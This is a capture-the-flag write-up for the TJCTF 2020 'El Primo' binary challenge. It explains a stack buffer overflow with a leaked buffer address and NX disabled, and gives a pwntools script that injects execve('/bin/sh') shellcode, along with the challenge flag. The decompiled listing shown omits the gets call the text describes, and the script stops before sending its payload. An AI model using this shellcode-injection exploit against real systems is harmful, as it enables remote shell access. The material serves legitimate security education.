
# El Primo

> My friend just started playing Brawl Stars and he keeps raging because he can't beat El Primo! Can you help him?
> nc p1.tjctf.org 8011

## Description

Let's decompile the binary with Ghidra.

undefined4 main(void)
char local_30 [32];
undefined *local_10;

local_10 = &stack0x00000004;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("What\'s my hard counter?");
printf("hint: %p\n",local_30);
return 0;

We get a possible buffer overflow with the `gets` function, and the `printf` leaks the address of the buffer. We check the security of the binary, and surprisingly, NX is disabled.

## Solution

As NX is disabled, we can include a shellcode in the buffer and jump there. The only thing that I had to do in addition was to preserve the value of `ebp` on the stack (otherwise I had a segfault when leaving the function), but then its value is known once we know the address of the buffer.

from pwn import *

sh = remote('p1.tjctf.org', 8011)

shellcode = asm(shellcraft.i386.linux.execve('/bin/sh'))

print(sh.recvuntil("hint: ").decode())
addr = sh.recvline().decode()
buf_addr = int(addr, 16)

ebp_value = buf_addr + 0x40

payload = shellcode + b"\x00"*(32-len(shellcode)) + p32(ebp_value) + b'a'*24 + p32(buf_addr)


Flag: `tjctf{3L_PR1M0O0OOO!1!!}`

Original writeup (https://github.com/apoirrier/CTFs-writeups/blob/master/TJCTF2020/Pwn/ElPrimo.md).